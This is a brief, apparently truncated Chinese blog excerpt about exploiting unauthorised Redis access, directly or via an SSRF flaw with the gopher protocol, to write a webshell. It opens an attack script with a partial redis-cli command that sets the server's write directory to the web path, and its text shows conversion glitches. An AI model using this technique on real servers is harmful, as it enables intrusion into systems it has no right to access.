redis利用gopher協議寫shell

前言 現在redis未受權訪問並很多見，而若是redis可在外網訪問，那麼利用方式就比較簡單了，若是redis不能在外網訪問，但站點存在ssrf漏洞，則redis未受權漏洞依舊能夠利用。php 利用 外網可訪問html 先說外網可訪問的狀況。咱們直接編寫腳本attack.shpython redis-cli -h $1 -p $2 config set dir /the/web/path redi

>>阅读原文<<